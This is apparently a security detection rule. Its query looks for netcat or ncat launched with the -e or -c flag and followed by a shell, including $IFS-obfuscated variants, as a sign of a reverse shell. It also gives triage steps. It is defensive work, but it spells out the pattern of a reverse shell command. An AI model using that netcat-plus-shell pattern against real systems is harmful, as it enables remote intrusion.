Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
/ncat Shell Execution /nc Shell Execution
LOLBINs Unux Execution
{{ mitre("T1059.004")}}
Data Source(s): Command, Process
let selection_flags = dynamic([' -c ',' -e ' ]);
let selection_shell = dynamic([' ash', ' bash', ' bsh', ' csh', ' ksh', ' pdksh', ' sh', ' tcsh', '/bin/ash', '/bin/bash', '/bin/bsh', '/bin/csh', '/bin/ksh', '/bin/pdksh', '/bin/sh', '/bin/tcsh', '/bin/zsh', '$IFSash', '$IFSbash', '$IFSbsh', '$IFScsh', '$IFSksh', '$IFSpdksh', '$IFSsh', '$IFStcsh', '$IFSzsh']);
| where ActionType == "ProcessCreated"
| where FolderPath endswith "/ncat" or FolderPath endswith "/nc" //selection_nc
| where ProcessCommandLine has_any (selection_flags)
| where ProcessCommandLine has_any (selection_shell)
- Validate the use of netcat in the environment, confirm with administrator team
- Verify the account, timestamp, and command lines executed, whether the activity was approved.
- Legitimate admin activities using netcat
Version 1.0 (date: 15/03/2024)